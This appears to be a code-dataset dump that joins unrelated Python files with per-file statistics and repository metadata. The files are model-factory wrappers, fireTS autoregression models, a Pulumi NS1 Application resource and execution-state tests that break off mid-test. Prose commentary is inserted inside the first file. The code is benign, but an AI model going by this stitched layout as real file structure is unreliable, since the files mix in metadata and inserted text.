kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt50_32x4d(**kwargs)
return model
def resnext50_64x4d(pretrained=False, **kwargs):
"""
ResNeXt50_64x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt50_64x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt50_64x4d(**kwargs)
return model
def darknet53(pretrained=False, **kwargs):
"""
DarkNet53
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `DarkNet53` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.DarkNet53(**kwargs)
return model
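All of the factory wrappers above share one pattern: merge `pretrained` into `kwargs` and forward everything to the corresponding `backbone` class. A minimal, self-contained sketch of that pattern, using a hypothetical dummy class in place of the real backbone models:

```python
class _DummyBackboneModel:
    # Illustrative stand-in for backbone.MobileNetV2_x0_5 and friends;
    # not part of the real backbone module.
    def __init__(self, pretrained=False, class_dim=1000):
        self.pretrained = pretrained
        self.class_dim = class_dim


def _make_factory(cls):
    # Generic version of the repeated wrapper pattern above:
    # fold `pretrained` into kwargs, then forward everything to the class.
    def factory(pretrained=False, **kwargs):
        kwargs.update({'pretrained': pretrained})
        return cls(**kwargs)
    return factory


dummy_mobilenet = _make_factory(_DummyBackboneModel)
model = dummy_mobilenet(pretrained=True, class_dim=10)
print(model.pretrained, model.class_dim)  # True 10
```

The real functions differ only in which backbone class they forward to, which is why their bodies are identical line for line.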
| 35.608365 | 145 | 0.5958 | 3,046 | 28,095 | 5.380171 | 0.076822 | 0.041006 | 0.070295 | 0.065963 | 0.813583 | 0.781181 | 0.745668 | 0.71351 | 0.71351 | 0.71351 | 0 | 0.04152 | 0.310767 | 28,095 | 788 | 146 | 35.653553 | 0.804792 | 0.529027 | 0 | 0.443925 | 0 | 0.004673 | 0.061808 | 0 | 0 | 0 | 0 | 0 | 0.004673 | 1 | 0.242991 | false | 0 | 0.023364 | 0 | 0.495327 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7f95d774f7ccc47ac786680a9d060297c9acf19 | 9,592 | py | Python | fireTS/models.py | ballcap231/fireTS | 74cc89a14d67edabf31139d1552025d54791f2a9 | [
"MIT"
] | null | null | null | fireTS/models.py | ballcap231/fireTS | 74cc89a14d67edabf31139d1552025d54791f2a9 | [
"MIT"
] | null | null | null | fireTS/models.py | ballcap231/fireTS | 74cc89a14d67edabf31139d1552025d54791f2a9 | [
"MIT"
] | null | null | null | from fireTS.core import GeneralAutoRegressor
from sklearn.utils.validation import check_X_y
from sklearn.metrics.regression import r2_score, mean_squared_error
import numpy as np
class NARX(GeneralAutoRegressor):
r"""
NARX stands for `Nonlinear AutoRegressive eXogenous model
<https://en.wikipedia.org/wiki/Nonlinear_autoregressive_exogenous_model>`_.
The model equation is written as follows.
.. math::
y(t + 1) &=& f(y(t), ..., y(t-p+1), \\
& & x_1(t - d_1), ..., x_1(t-d_1-q_1+1), \\
& & ..., x_m(t - d_m), ..., x_m(t - d_m - q_m + 1)) + e(t)
:label: narx
:param object base_estimator: an estimator object that implements the
scikit-learn API (fit, and predict). The
estimator will be used to fit the function
:math:`f` in equation :eq:`narx`.
:param int auto_order: the autoregression order :math:`p` in equation
:eq:`narx`.
:param list exog_order: the exogenous input order, a list of integers
representing the order for each exogenous input,
i.e. :math:`[q_1, q_2, ..., q_m]` in equation
:eq:`narx`.
:param list exog_delay: the delays of the exogenous inputs, a list of
integers representing the delay of each exogenous
input, i.e. :math:`[d_1, d_2, ..., d_m]` in
equation :eq:`narx`. By default, all the delays are
set to 0.
:param dict base_params: other keyword arguments for base_estimator.
"""
def __init__(self,
base_estimator,
auto_order,
exog_order,
exog_delay=None,
**base_params):
super(NARX, self).__init__(
base_estimator,
auto_order,
exog_order,
exog_delay=exog_delay,
pred_step=1,
**base_params)
def score(self, X, y, step=1, method="r2"):
"""
Produce multi-step prediction of y, and compute the metrics against y.
NaN is ignored when computing the metrics.
:param array-like X: exogenous input time series, shape = (n_samples,
n_exog_inputs)
:param array-like y: target time series to predict, shape = (n_samples)
:param int step: prediction step.
:param string method: could be "r2" (R Square) or "mse" (Mean Square
Error).
:return: prediction metric. NaN is ignored when computing the metrics.
"""
ypred = self.predict(X, y, step=step)
mask = np.isnan(y) | np.isnan(ypred)
if method == "r2":
return r2_score(y[~mask], ypred[~mask])
elif method == "mse":
return mean_squared_error(y[~mask], ypred[~mask])
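`score` masks out positions where either series is NaN before computing the metric. A small stand-alone illustration of that masking with plain NumPy (MSE case shown; the r2 branch is analogous, and `masked_mse` is an illustrative helper, not part of fireTS):

```python
import numpy as np


def masked_mse(y, ypred):
    # Drop positions where either series is NaN, then average squared error,
    # mirroring the `~mask` indexing used in score().
    y, ypred = np.asarray(y, dtype=float), np.asarray(ypred, dtype=float)
    mask = np.isnan(y) | np.isnan(ypred)
    err = y[~mask] - ypred[~mask]
    return float(np.mean(err ** 2))


print(masked_mse([1.0, 2.0, np.nan], [1.0, 4.0, 5.0]))  # 2.0
```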
# TODO: add forecast method
def predict(self, X, y, step=1):
r"""
Produce multi-step prediction of y. The multi-step prediction is done
recursively by using the future inputs in X. The prediction equation is
as follows:
.. math::
\hat{y}(t + k) &=& f(\hat{y}(t + k - 1), ..., \hat{y}(t + k - p), \\
& &x_1(t + k - 1 - d_1), ..., x_1(t + k - d_1 - q_1) \\
& &..., x_m(t + k - 1 - d_m), ..., x_m(t + k - d_m - q_m))
:param array-like X: exogenous input time series, shape = (n_samples,
n_exog_inputs)
:param array-like y: target time series to predict, shape = (n_samples)
:param int step: prediction step.
:return: k-step prediction time series, shape = (n_samples). The
:math:`i` th value of the output is the k-step prediction of
the :math:`i` th value of the input ``y``. The first ``step +
max(auto_order - 1, max(exog_order + exog_delay) - 1)`` values of the
output are ``np.nan``.
"""
# TODO: this allows nan in X and y, but might need more error checking
X, y = np.array(X), np.array(y)
if len(self.exog_order) != X.shape[1]:
raise ValueError(
'The number of columns of X must be the same as the length of exog_order.'
)
p = self._get_lag_feature_processor(X, y)
features = p.generate_lag_features()
for k in range(step):
yhat = self._predictNA(features)
if k == step - 1:
break
features = p.update(yhat)
ypred = np.concatenate([np.empty(step) * np.nan, yhat])[0:len(y)]
return ypred
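The recursion in `predict` can be illustrated independently of fireTS: each one-step prediction is fed back in as the newest lag value. A toy example with a known one-step model `y(t+1) = 0.5 * y(t)` (the names here are illustrative, not the library's internals):

```python
def recursive_predict(y_last, coef, step):
    # k-step prediction by iterating the one-step model k times,
    # feeding each prediction back in as the next "observed" value --
    # the same loop structure as the `for k in range(step)` above.
    yhat = y_last
    for _ in range(step):
        yhat = coef * yhat
    return yhat


print(recursive_predict(8.0, 0.5, 3))  # 1.0
```

In the real `NARX.predict`, the fed-back value updates a full lag-feature matrix (including the exogenous inputs), but the control flow is the same.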
class DirectAutoRegressor(GeneralAutoRegressor):
r"""
This model performs autoregression with exogenous inputs on the k-step
ahead output directly. The model equation is written as follows.
.. math::
y(t + k) &=& f(y(t), ..., y(t-p+1), \\
& & x_1(t - d_1), ..., x_1(t-d_1-q_1+1), \\
& & ..., x_m(t - d_m), ..., x_m(t - d_m - q_m + 1)) + e(t)
:label: direct
:param object base_estimator: an estimator object that implements the
scikit-learn API (fit, and predict). The
estimator will be used to fit the function
:math:`f` in equation :eq:`direct`.
:param int auto_order: the autoregression order :math:`p` in equation
:eq:`direct`.
:param list exog_order: the exogenous input order, a list of integers
representing the order for each exogenous input,
i.e. :math:`[q_1, q_2, ..., q_m]` in equation
:eq:`direct`.
:param int pred_step: the prediction step :math:`k` in equation :eq:`direct`.
By default, it is set to 1.
:param list exog_delay: the delays of the exogenous inputs, a list of
integers representing the delay of each exogenous
input, i.e. :math:`[d_1, d_2, ..., d_m]` in
equation :eq:`direct`. By default, all the delays
are set to 0.
:param dict base_params: other keyword arguments for base_estimator.
"""
def __init__(self,
base_estimator,
auto_order,
exog_order,
pred_step,
exog_delay=None,
**base_params):
super(DirectAutoRegressor, self).__init__(
base_estimator,
auto_order,
exog_order,
exog_delay=exog_delay,
pred_step=pred_step,
**base_params)
def predict(self, X, y):
r"""
Produce multi-step prediction of y. The multi-step prediction is done
directly. No future X inputs are used in the prediction. The prediction
equation is as follows:
.. math::
\hat{y}(t + k) &=& f(y(t), ..., y(t - p + 1), \\
& & x_1(t - d_1), ..., x_1(t - d_1 - q_1 + 1) \\
& & ..., x_m(t - d_m), ..., x_m(t - d_m - q_m + 1))
:param array-like X: exogenous input time series, shape = (n_samples,
n_exog_inputs)
:param array-like y: target time series to predict, shape = (n_samples)
:return: k-step prediction time series, shape = (n_samples). The
:math:`i` th value of the output is the k-step prediction of
the :math:`i` th value of the input ``y``. The first
``pred_step + max(auto_order - 1, max(exog_order +
exog_delay) - 1)`` values of the output are ``np.nan``.
"""
# TODO: this allows nan in X and y, but might need more error checking
X, y = np.array(X), np.array(y)
if len(self.exog_order) != X.shape[1]:
raise ValueError(
'The number of columns of X must be the same as the length of exog_order.'
)
p = self._get_lag_feature_processor(X, y)
features = p.generate_lag_features()
yhat = self._predictNA(features)
ypred = np.concatenate([np.empty(self.pred_step) * np.nan,
yhat])[0:len(y)]
return ypred
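Unlike NARX, the direct regressor never iterates: the k-step target is regressed on lagged values in one shot. A hypothetical helper (not the fireTS lag-feature processor) sketching how such direct training pairs are built from a single series:

```python
import numpy as np


def direct_lag_features(y, auto_order, pred_step):
    # Pair the lag vector (y(t), ..., y(t - auto_order + 1)) with the
    # k-step-ahead target y(t + pred_step), for every valid t.
    rows, targets = [], []
    for t in range(auto_order - 1, len(y) - pred_step):
        rows.append(y[t - auto_order + 1:t + 1][::-1])  # newest lag first
        targets.append(y[t + pred_step])
    return np.array(rows), np.array(targets)


y = np.arange(10.0)
X, target = direct_lag_features(y, auto_order=2, pred_step=3)
print(X.shape, target[:3])  # (6, 2) [4. 5. 6.]
```

Fitting `base_estimator` on `(X, target)` then yields k-step predictions without needing any future exogenous inputs, which is exactly the trade-off `DirectAutoRegressor.predict` describes.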
def score(self, X, y, method="r2", verbose=False):
"""
Produce multi-step prediction of y, and compute the metrics against y.
NaN is ignored when computing the metrics.
:param array-like X: exogenous input time series, shape = (n_samples,
n_exog_inputs)
:param array-like y: target time series to predict, shape = (n_samples)
:param string method: could be "r2" (R Square) or "mse" (Mean Square
Error).
:return: prediction metric. NaN is ignored when computing the metrics.
"""
ypred = self.predict(X, y)
mask = np.isnan(y) | np.isnan(ypred)
if verbose:
print('Evaluating {} score, {} of {} data points are evaluated.'.
format(method, np.sum(~mask), y.shape[0]))
if method == "r2":
return r2_score(y[~mask], ypred[~mask])
elif method == "mse":
return mean_squared_error(y[~mask], ypred[~mask])
| 44 | 90 | 0.527836 | 1,250 | 9,592 | 3.9176 | 0.1576 | 0.005309 | 0.026547 | 0.005718 | 0.814172 | 0.783541 | 0.769655 | 0.768021 | 0.754339 | 0.742495 | 0 | 0.011155 | 0.36447 | 9,592 | 217 | 91 | 44.202765 | 0.792159 | 0.60957 | 0 | 0.592593 | 0 | 0 | 0.069661 | 0 | 0 | 0 | 0 | 0.013825 | 0 | 1 | 0.074074 | false | 0 | 0.049383 | 0 | 0.222222 | 0.012346 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4d0511f6729a623f4f1781345f397bc7b3b397d9 | 17,944 | py | Python | sdk/python/pulumi_ns1/application.py | pulumi/pulumi-ns1 | 7200ab674c814fd18f8b59a90ee130574df4eafc | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_ns1/application.py | pulumi/pulumi-ns1 | 7200ab674c814fd18f8b59a90ee130574df4eafc | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2020-06-24T11:18:00.000Z | 2022-03-31T15:37:47.000Z | sdk/python/pulumi_ns1/application.py | pulumi/pulumi-ns1 | 7200ab674c814fd18f8b59a90ee130574df4eafc | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-01-12T23:15:35.000Z | 2021-01-12T23:15:35.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ApplicationArgs', 'Application']
@pulumi.input_type
class ApplicationArgs:
def __init__(__self__, *,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input['ApplicationDefaultConfigArgs']] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing an Application resource.
:param pulumi.Input[bool] active: Indicates whether or not this application is currently active and usable for traffic
steering.
:param pulumi.Input[int] browser_wait_millis: The amount of time (in milliseconds) the browser should wait before running
measurements.
:param pulumi.Input['ApplicationDefaultConfigArgs'] default_config: -(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used.
:param pulumi.Input[int] jobs_per_transaction: -(Optional) Number of jobs to measure per user impression.
:param pulumi.Input[str] name: Descriptive name for this Pulsar app.
"""
if active is not None:
pulumi.set(__self__, "active", active)
if browser_wait_millis is not None:
pulumi.set(__self__, "browser_wait_millis", browser_wait_millis)
if default_config is not None:
pulumi.set(__self__, "default_config", default_config)
if jobs_per_transaction is not None:
pulumi.set(__self__, "jobs_per_transaction", jobs_per_transaction)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def active(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not this application is currently active and usable for traffic
steering.
"""
return pulumi.get(self, "active")
@active.setter
def active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active", value)
@property
@pulumi.getter(name="browserWaitMillis")
def browser_wait_millis(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time (in milliseconds) the browser should wait before running
measurements.
"""
return pulumi.get(self, "browser_wait_millis")
@browser_wait_millis.setter
def browser_wait_millis(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "browser_wait_millis", value)
@property
@pulumi.getter(name="defaultConfig")
def default_config(self) -> Optional[pulumi.Input['ApplicationDefaultConfigArgs']]:
"""
-(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used.
"""
return pulumi.get(self, "default_config")
@default_config.setter
def default_config(self, value: Optional[pulumi.Input['ApplicationDefaultConfigArgs']]):
pulumi.set(self, "default_config", value)
@property
@pulumi.getter(name="jobsPerTransaction")
def jobs_per_transaction(self) -> Optional[pulumi.Input[int]]:
"""
-(Optional) Number of jobs to measure per user impression.
"""
return pulumi.get(self, "jobs_per_transaction")
@jobs_per_transaction.setter
def jobs_per_transaction(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "jobs_per_transaction", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Descriptive name for this Pulsar app.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _ApplicationState:
def __init__(__self__, *,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input['ApplicationDefaultConfigArgs']] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Application resources.
:param pulumi.Input[bool] active: Indicates whether or not this application is currently active and usable for traffic
steering.
:param pulumi.Input[int] browser_wait_millis: The amount of time (in milliseconds) the browser should wait before running
measurements.
:param pulumi.Input['ApplicationDefaultConfigArgs'] default_config: -(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used.
:param pulumi.Input[int] jobs_per_transaction: -(Optional) Number of jobs to measure per user impression.
:param pulumi.Input[str] name: Descriptive name for this Pulsar app.
"""
if active is not None:
pulumi.set(__self__, "active", active)
if browser_wait_millis is not None:
pulumi.set(__self__, "browser_wait_millis", browser_wait_millis)
if default_config is not None:
pulumi.set(__self__, "default_config", default_config)
if jobs_per_transaction is not None:
pulumi.set(__self__, "jobs_per_transaction", jobs_per_transaction)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def active(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not this application is currently active and usable for traffic
steering.
"""
return pulumi.get(self, "active")
@active.setter
def active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active", value)
@property
@pulumi.getter(name="browserWaitMillis")
def browser_wait_millis(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time (in milliseconds) the browser should wait before running
measurements.
"""
return pulumi.get(self, "browser_wait_millis")
@browser_wait_millis.setter
def browser_wait_millis(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "browser_wait_millis", value)
@property
@pulumi.getter(name="defaultConfig")
def default_config(self) -> Optional[pulumi.Input['ApplicationDefaultConfigArgs']]:
"""
-(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used.
"""
return pulumi.get(self, "default_config")
@default_config.setter
def default_config(self, value: Optional[pulumi.Input['ApplicationDefaultConfigArgs']]):
pulumi.set(self, "default_config", value)
@property
@pulumi.getter(name="jobsPerTransaction")
def jobs_per_transaction(self) -> Optional[pulumi.Input[int]]:
"""
-(Optional) Number of jobs to measure per user impression.
"""
return pulumi.get(self, "jobs_per_transaction")
@jobs_per_transaction.setter
def jobs_per_transaction(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "jobs_per_transaction", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Descriptive name for this Pulsar app.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
class Application(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']]] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides an NS1 Pulsar application resource. This can be used to create, modify, and delete applications.
## Example Usage
```python
import pulumi
import pulumi_ns1 as ns1
# Create a new pulsar application with default config
ns1_app = ns1.Application("ns1App", default_config=ns1.ApplicationDefaultConfigArgs(
http=True,
https=False,
job_timeout_millis=100,
request_timeout_millis=100,
static_values=True,
))
```
## NS1 Documentation
[Application Api Docs](https://ns1.com/api#get-list-pulsar-applications)
## Import
```sh
$ pulumi import ns1:index/application:Application ns1_application
```
So for the example above
```sh
$ pulumi import ns1:index/application:Application example terraform.example.io
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] active: Indicates whether or not this application is currently active and usable for traffic
steering.
:param pulumi.Input[int] browser_wait_millis: The amount of time (in milliseconds) the browser should wait before running
measurements.
:param pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']] default_config: -(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used.
:param pulumi.Input[int] jobs_per_transaction: -(Optional) Number of jobs to measure per user impression.
:param pulumi.Input[str] name: Descriptive name for this Pulsar app.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ApplicationArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an NS1 Pulsar application resource. This can be used to create, modify, and delete applications.
## Example Usage
```python
import pulumi
import pulumi_ns1 as ns1
# Create a new pulsar application with default config
ns1_app = ns1.Application("ns1App", default_config=ns1.ApplicationDefaultConfigArgs(
http=True,
https=False,
job_timeout_millis=100,
request_timeout_millis=100,
static_values=True,
))
```
## NS1 Documentation
[Application Api Docs](https://ns1.com/api#get-list-pulsar-applications)
## Import
```sh
$ pulumi import ns1:index/application:Application ns1_application
```
So for the example above
```sh
$ pulumi import ns1:index/application:Application example terraform.example.io
```
:param str resource_name: The name of the resource.
:param ApplicationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']]] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationArgs.__new__(ApplicationArgs)
__props__.__dict__["active"] = active
__props__.__dict__["browser_wait_millis"] = browser_wait_millis
__props__.__dict__["default_config"] = default_config
__props__.__dict__["jobs_per_transaction"] = jobs_per_transaction
__props__.__dict__["name"] = name
super(Application, __self__).__init__(
'ns1:index/application:Application',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']]] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None) -> 'Application':
"""
Get an existing Application resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] active: Indicates whether or not this application is currently active and usable for traffic
steering.
:param pulumi.Input[int] browser_wait_millis: The amount of time (in milliseconds) the browser should wait before running
measurements.
:param pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']] default_config: -(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used.
:param pulumi.Input[int] jobs_per_transaction: -(Optional) Number of jobs to measure per user impression.
:param pulumi.Input[str] name: Descriptive name for this Pulsar app.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApplicationState.__new__(_ApplicationState)
__props__.__dict__["active"] = active
__props__.__dict__["browser_wait_millis"] = browser_wait_millis
__props__.__dict__["default_config"] = default_config
__props__.__dict__["jobs_per_transaction"] = jobs_per_transaction
__props__.__dict__["name"] = name
return Application(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def active(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates whether or not this application is currently active and usable for traffic
steering.
"""
return pulumi.get(self, "active")
@property
@pulumi.getter(name="browserWaitMillis")
def browser_wait_millis(self) -> pulumi.Output[Optional[int]]:
"""
The amount of time (in milliseconds) the browser should wait before running
measurements.
"""
return pulumi.get(self, "browser_wait_millis")
@property
@pulumi.getter(name="defaultConfig")
def default_config(self) -> pulumi.Output[Optional['outputs.ApplicationDefaultConfig']]:
"""
-(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used.
"""
return pulumi.get(self, "default_config")
@property
@pulumi.getter(name="jobsPerTransaction")
def jobs_per_transaction(self) -> pulumi.Output[Optional[int]]:
"""
-(Optional) Number of jobs to measure per user impression.
"""
return pulumi.get(self, "jobs_per_transaction")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Descriptive name for this Pulsar app.
"""
return pulumi.get(self, "name")
| 42.622328 | 185 | 0.653645 | 2,027 | 17,944 | 5.569808 | 0.098175 | 0.067228 | 0.075731 | 0.035075 | 0.850221 | 0.836758 | 0.831089 | 0.824092 | 0.819575 | 0.814526 | 0 | 0.002838 | 0.25379 | 17,944 | 420 | 186 | 42.72381 | 0.840329 | 0.369817 | 0 | 0.769608 | 1 | 0 | 0.121278 | 0.031461 | 0 | 0 | 0 | 0 | 0 | 1 | 0.156863 | false | 0.004902 | 0.034314 | 0 | 0.284314 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4d0ff943cd322f34a634a297edae3c7c06f5d4b5 | 5,192 | py | Python | tests/unit/master/core/execution/test_execution_state.py | yassineazzouz/kraken | 30d536eae2583e6fff51becbff836301058b8e69 | [
"MIT"
] | 1 | 2020-09-01T15:16:11.000Z | 2020-09-01T15:16:11.000Z | tests/unit/master/core/execution/test_execution_state.py | yassineazzouz/kraken | 30d536eae2583e6fff51becbff836301058b8e69 | [
"MIT"
] | null | null | null | tests/unit/master/core/execution/test_execution_state.py | yassineazzouz/kraken | 30d536eae2583e6fff51becbff836301058b8e69 | [
"MIT"
] | null | null | null | import pytest
from tanit.common.model.execution_type import ExecutionType
from tanit.common.model.job import Job
from tanit.master.core.execution.execution_job import (
IllegalStateTransitionException, # NOQA
)
from tanit.master.core.execution.execution_state import ExecutionState # NOQA
from tanit.master.core.execution.job_factory import JobFactory # NOQA
job_factory = JobFactory()
def mock_job_exec(num_tasks):
job = job_factory.create_job(Job(ExecutionType.MOCK, {"num_tasks": str(num_tasks)}))
job.setup()
return job
class TestExecutionState:
def test_initial_state(self):
job = mock_job_exec(2)
assert job.state == ExecutionState.SUBMITTED
for task in job.get_tasks():
assert task.state == ExecutionState.SUBMITTED
def test_schedule_state_transition(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
assert job.state == ExecutionState.SCHEDULED
for task in job.get_tasks()[1:]:
task.on_schedule()
assert job.state == ExecutionState.SCHEDULED
def test_dispatch_state(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
assert job.state == ExecutionState.DISPATCHED
for task in job.get_tasks()[1:]:
task.on_schedule()
assert job.state == ExecutionState.DISPATCHED
for task in job.get_tasks()[1:]:
task.on_dispatch()
assert job.state == ExecutionState.DISPATCHED
def test_running_state(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_schedule()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_dispatch()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_start()
assert job.state == ExecutionState.RUNNING
def test_running_state_2(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
with pytest.raises(IllegalStateTransitionException):
job.get_tasks()[0].on_start()
def test_finish_state(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
job.get_tasks()[0].on_finish()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_schedule()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_dispatch()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_start()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_finish()
assert job.state == ExecutionState.FINISHED
def test_finish_state_2(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
with pytest.raises(IllegalStateTransitionException):
job.get_tasks()[0].on_finish()
def test_fail_state_1(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
job.get_tasks()[0].on_fail()
assert job.state == ExecutionState.FAILED
for task in job.get_tasks()[1:]:
task.on_schedule()
task.on_dispatch()
task.on_start()
task.on_finish()
assert job.state == ExecutionState.FAILED
def test_fail_state_2(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
job.get_tasks()[0].on_finish()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_schedule()
task.on_dispatch()
task.on_start()
task.on_fail()
assert job.state == ExecutionState.FAILED
def test_state_reset(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
